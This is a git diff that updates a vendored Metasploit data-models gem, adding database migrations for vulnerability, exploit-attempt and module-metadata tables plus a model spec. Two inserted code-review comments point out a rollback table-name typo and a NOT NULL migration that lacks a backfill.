diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb
new file mode 100755
index 0000000000..4122503692
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb
@@ -0,0 +1,24 @@
+class ExpandDetails2 < ActiveRecord::Migration
+
+ def self.up
+ add_column :host_details, :nx_site_name, :string
+ add_column :host_details, :nx_site_importance, :string
+ add_column :host_details, :nx_scan_template, :string
+ add_column :host_details, :nx_risk_score, :float
+
+ add_column :vuln_details, :nx_scan_id, :integer
+ add_column :vuln_details, :nx_vulnerable_since, :timestamp
+ add_column :vuln_details, :nx_pci_compliance_status, :string
+ end
+
+ def self.down
+ remove_column :host_details, :nx_site_name
+ remove_column :host_details, :nx_site_importance
+ remove_column :host_details, :nx_scan_template
+ remove_column :host_details, :nx_risk_score
+
+ remove_column :vuln_details, :nx_scan_id
+ remove_column :vuln_details, :nx_vulnerable_since
+ remove_column :vuln_details, :nx_pci_compliance_status
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb
new file mode 100755
index 0000000000..b943fe358f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb
@@ -0,0 +1,19 @@
+class AddVulnAttempts < ActiveRecord::Migration
+
+ def self.up
+ create_table :vuln_attempts do |t|
+ t.integer :vuln_id # Vuln table reference
+ t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited
+ t.boolean :exploited # Whether or not the attempt succeeded
+ t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant
+ t.string :username # The user that tested this vulnerability
+ t.text :module # The specific module name that was used
+ t.integer :session_id # Database identifier of any opened session
+ t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits)
+ end
+ end
+
+ def self.down
+ drop_table :vuln_attempts
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
new file mode 100755
index 0000000000..c34101fd89
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
@@ -0,0 +1,14 @@
+class AddVulnAndHostCounterCaches < ActiveRecord::Migration
+
+ def self.up
+ add_column :hosts, :host_detail_count, :integer, :default => 0
+ add_column :vulns, :vuln_detail_count, :integer, :default => 0
+ add_column :vulns, :vuln_attempt_count, :integer, :default => 0
+ end
+
+ def self.down
+ remove_column :hosts, :host_detail_count
+ remove_column :vulns, :vuln_detail_count
+ remove_column :vulns, :vuln_attempt_count
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb
new file mode 100755
index 0000000000..cb99f7ee84
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb 
@@ -0,0 +1,118 @@
+class AddModuleDetails < ActiveRecord::Migration
+
+ def self.up
+
+ create_table :module_details do |t|
+ t.timestamp :mtime # disk modified time
+ t.text :file # location on disk
+ t.string :mtype # exploit, auxiliary, post, etc
+ t.text :refname # module path (no type)
+ t.text :fullname # module path with type
+ t.text :name # module title
+ t.integer :rank # exploit rank
+ t.text :description #
+ t.string :license # MSF_LICENSE
+ t.boolean :privileged # true or false
+ t.timestamp :disclosure_date # Mar 10 2004
+ t.integer :default_target # 0
+ t.text :default_action # "scan"
+ t.string :stance # "passive"
+ t.boolean :ready # true/false
+ end
+
+ add_index :module_details, :refname
+ add_index :module_details, :name
+ add_index :module_details, :description
+ add_index :module_details, :mtype
+
+ create_table :module_authors do |t|
+ t.integer :module_detail_id
+ t.text :name
+ t.text :email
+ end
+ add_index :module_authors, :module_detail_id
+
+ create_table :module_mixins do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_mixins, :module_detail_id
+
+ create_table :module_targets do |t|
+ t.integer :module_detail_id
+ t.integer :index
+ t.text :name
+ end
+ add_index :module_targets, :module_detail_id
+
+ create_table :module_actions do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_actions, :module_detail_id
+
+ create_table :module_refs do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_refs, :module_detail_id
+ add_index :module_refs, :name
+
+ create_table :module_archs do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_archs, :module_detail_id
+
+ create_table :module_platforms do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_platforms, :module_detail_id
+
+ end
+
+ def self.down
+ remove_index :module_details, :refname
+ remove_index :module_details, :name
+ remove_index :module_details, :description
+ remove_index :module_details, :mtype
+
+ remove_index :module_authors, :module_detail_id
+ remove_index :module_mixins, :module_detail_id
+ remove_index :module_targets, :module_detail_id
+ remove_index :module_actions, :module_detail_id
+ remove_index :module_refs, :module_detail_id
+ remove_index :module_refs, :name
+ remove_index :module_archs, :module_detail_id
+ remove_index :module_platform, :module_detail_id
+
+ drop_table :module_details
+ drop_table :module_authors
+ drop_table :module_mixins
+ drop_table :module_targets
+ drop_table :module_actions
+ drop_table :module_refs
+ drop_table :module_archs
+ drop_table :module_platforms
+
+ end
+end
+
+=begin
+
+Mdm::Host.find_by_sql("
+SELECT
+ hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref
+FROM
+ hosts,vulns,vulns_refs,refs,module_refs,module_details
+WHERE
+ hosts.id = vulns.host_id AND
+ vulns.id = vulns_refs.vuln_id AND
+ vulns_refs.ref_id = refs.id AND
+ refs.name = module_refs.name AND
+ module_refs.module_detail_id = modules_details.id
+").map{|x| [x.address, x.mname, x.vname, x.vref ] }
+
+
+=end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb
new file mode 100755
index 0000000000..22d3ec0b1f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb
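Review bot: `self.down` calls `remove_index :module_platform, :module_detail_id`, but `self.up` creates and indexes the table as `:module_platforms`, so a rollback raises on the missing table before any of the `drop_table` calls run; the line should read `remove_index :module_platforms, :module_detail_id`. The example query in the `=begin` block has the same kind of slip, joining on `modules_details.id` where the table created above is `module_details`. Since this is a vendored copy under lib/gemcache, the fix belongs in the metasploit_data_models gem and the cached copy should be refreshed rather than patched in place. Separately, `add_index :module_details, :description` places a plain btree index on a free-text column; on PostgreSQL a long enough description would exceed the index row size limit and fail the insert, which is worth confirming against real module description lengths before keeping that index.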
@@ -0,0 +1,26 @@
+class AddExploitAttempts < ActiveRecord::Migration
+
+ def self.up
+ create_table :exploit_attempts do |t|
+ t.integer :host_id # Host table reference (primary)
+ t.integer :service_id # Service table reference (optional)
+ t.integer :vuln_id # Vuln table reference (optional)
+ t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited
+ t.boolean :exploited # Whether or not the attempt succeeded
+ t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant
+ t.string :username # The user that tested this vulnerability
+ t.text :module # The specific module name that was used
+ t.integer :session_id # Database identifier of any opened session
+ t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits)
+ t.integer :port # Port -> Services are created/destroyed frequently and failed
+ t.string :proto # Protocol | attempts may be against closed ports.
+ end
+
+ add_column :hosts, :exploit_attempt_count, :integer, :default => 0
+ end
+
+ def self.down
+ drop_table :exploit_attempts
+ remove_column :hosts, :exploit_attempt_count
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb
new file mode 100755
index 0000000000..7d6dd0f96b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb
@@ -0,0 +1,12 @@
+class AddFailMessage < ActiveRecord::Migration
+
+ def self.up
+ add_column :vuln_attempts, :fail_detail, :text
+ add_column :exploit_attempts, :fail_detail, :text
+ end
+
+ def self.down
+ remove_column :vuln_attempts, :fail_detail
+ remove_column :exploit_attempts, :fail_detail
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb
new file mode 100644
index 0000000000..2160e61de6
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb
@@ -0,0 +1,13 @@
+class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration
+
+ def self.up
+ add_column :web_vulns, :owner, :string
+ add_column :web_vulns, :payload, :text
+ end
+
+ def self.down
+ remove_column :web_vulns, :owner
+ remove_column :web_vulns, :payload
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb
new file mode 100644
index 0000000000..bf0f9d7297
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb
@@ -0,0 +1,35 @@
+# Changes all the {COLUMNS} in the web_vulns table that are required for {Mdm::WebVuln}, but were previously
+# :null => true
+class ChangeRequiredColumnsToNullFalseInWebVulns < ActiveRecord::Migration
+ # Columns that were previously :null => true, but are actually required to be non-null, so should be
+ # :null => false
+ COLUMNS = [
+ :category,
+ :confidence,
+ :method,
+ :name,
+ :params,
+ :path,
+ :pname,
+ :proof,
+ :risk
+ ]
+ # Table in which {COLUMNS} are.
+ TABLE_NAME = :web_vulns
+
+ # Marks all the {COLUMNS} as :null => true
+ def down
+ COLUMNS.each do |column|
+ change_column_null(TABLE_NAME, column, true)
+ end
+ end
+
+ # Marks all the {COLUMNS} as :null => false
+ def up
+ COLUMNS.each do |column|
+ change_column_null(TABLE_NAME, column, false)
+ end
+ end
+
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb
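Review bot: `up` flips nine web_vulns columns to NOT NULL with no backfill, so on any database that already has a row with a NULL in one of them (these columns were previously nullable, as the class comment says) the loop aborts partway and, on adapters without transactional DDL, leaves the table with only some constraints applied. `change_column_null` accepts a fourth argument that updates existing NULLs before the constraint is added, but the columns here mix text, binary and integer types, so one shared default cannot serve them all. Either backfill per column before the loop or state the precondition in the class comment, e.g. `# Assumes no existing web_vulns row has a NULL in any of {COLUMNS}; backfill or delete such rows before migrating.`. As this is a vendored copy under lib/gemcache, the change belongs in the metasploit_data_models gem and should be pulled in through a refreshed cache.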
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb
new file mode 100755
index 0000000000..ee7b61398b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels
+ # MetasploitDataModels follows the {http://semver.org/ Semantic Versioning Specification}. At this time, the API
+ # is considered unstable because although the database migrations have moved from
+ # metasploit-framework/data/sql/migrate to db/migrate in this project, not all models have specs that verify the
+ # migrations (with have_db_column and have_db_index) and certain models may not be shared between metasploit-framework
+ # and pro, so models may be removed in the future. Because of the unstable API the version should remain below 1.0.0
+ VERSION = '0.5.1'
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake
new file mode 100644
index 0000000000..cc279684e7
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake
@@ -0,0 +1,27 @@
+# @note All options not specific to any given rake task should go in the .yardopts file so they are available to both
+# the below rake tasks and when invoking `yard` from the command line
+
+require 'yard'
+require 'yard/rake/yardoc_task'
+
+namespace :yard do
+ YARD::Rake::YardocTask.new(:doc) do |t|
+ # --no-stats here as 'stats' task called after will print fuller stats
+ t.options = ['--no-stats']
+
+ t.after = Proc.new {
+ Rake::Task['yard:stats'].execute
+ }
+ end
+
+ desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods"
+ task :stats => :environment do
+ stats = YARD::CLI::Stats.new
+ stats.run('--compact', '--list-undoc')
+ end
+end
+
+# @todo Figure out how to just clone description from yard:doc
+desc "Generate YARD documentation"
+# allow calling namespace to as a task that goes to default task for namespace
+task :yard => ['yard:doc']
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec
similarity index 88%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec
index ec0d9dd672..c3f3788558 100644
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec
@@ -18,6 +18,10 @@ Gem::Specification.new do |s|
 # ---- Dependencies ----
 s.add_development_dependency 'rake'
+ # markdown formatting for yard
+ s.add_development_dependency 'redcarpet'
+ # documentation
+ s.add_development_dependency 'yard'
 s.add_runtime_dependency 'activerecord', '>= 3.2.10'
 s.add_runtime_dependency 'activesupport'
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb
new file mode 100644
index 0000000000..d55706f947
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb
@@ -0,0 +1,87 @@
+require 'spec_helper'
+
+describe Mdm::WebVuln do
+ let(:confidence_range) do
+ 1 .. 100
+ end
+
+ let(:methods) do
+ [
+ 'GET',
+ 'POST',
+ # XXX not sure why PATH is valid since it's not an HTTP method verb.
+ 'PATH'
+ ]
+ end
+
+ let(:risk_range) do
+ 0 .. 5
+ end
+
+ context 'associations' do
+ it { should belong_to(:web_site).class_name('Mdm::WebSite') }
+ end
+
+ context 'CONSTANTS' do
+ it 'should define CONFIDENCE_RANGE' do
+ described_class::CONFIDENCE_RANGE.should == confidence_range
+ end
+
+ it 'should define METHODS in any order' do
+ described_class::METHODS.should =~ methods
+ end
+
+ it 'should define RISK_RANGE' do
+ described_class::RISK_RANGE.should == risk_range
+ end
+ end
+
+ context 'database' do
+ context 'columns' do
+ it { should have_db_column(:blame).of_type(:text) }
+ it { should have_db_column(:category).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:confidence).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:description).of_type(:text) }
+ it { should have_db_column(:method).of_type(:string).with_options(:limit => 1024, :null => false) }
+ it { should have_db_column(:name).of_type(:string).with_options(:limit => 1024, :null => false) }
+ it { should have_db_column(:owner).of_type(:string) }
+ it { should have_db_column(:params).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:path).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:payload).of_type(:text) }
+ it { should have_db_column(:pname).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:proof).of_type(:binary).with_options(:null => false) }
+ it { should have_db_column(:query).of_type(:text) }
+ it { should have_db_column(:request).of_type(:binary) }
+ it { should have_db_column(:risk).of_type(:integer).with_options(:null => false) }
+ it { should have_db_column(:web_site_id).of_type(:integer).with_options(:null => false) }
+
+ context 'timestamps' do
+ it { should have_db_column(:created_at).of_type(:datetime).with_options(:null => false) }
+ it { should have_db_column(:updated_at).of_type(:datetime).with_options(:null => false) }
+ end
+ end
+
+ context 'indices' do
+ it { should have_db_index(:method) }
+ it { should have_db_index(:name) }
+ it { should have_db_index(:path) }
+ end
+ end
+
+ context 'validations' do
+ it { should validate_presence_of :category }
+ it { should ensure_inclusion_of(:confidence).in_range(confidence_range) }
+ it { should ensure_inclusion_of(:method).in_array(methods) }
+ it { should validate_presence_of :name }
+ it { should validate_presence_of :path }
+ it { should validate_presence_of :params }
+ it { should validate_presence_of :pname }
+ it { should validate_presence_of :proof }
+ it { should ensure_inclusion_of(:risk).in_range(risk_range) }
+ it { should validate_presence_of :web_site }
+ end
+
+ context 'serializations' do
+ it { should serialize(:params).as_instance_of(MetasploitDataModels::Base64Serializer) }
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb
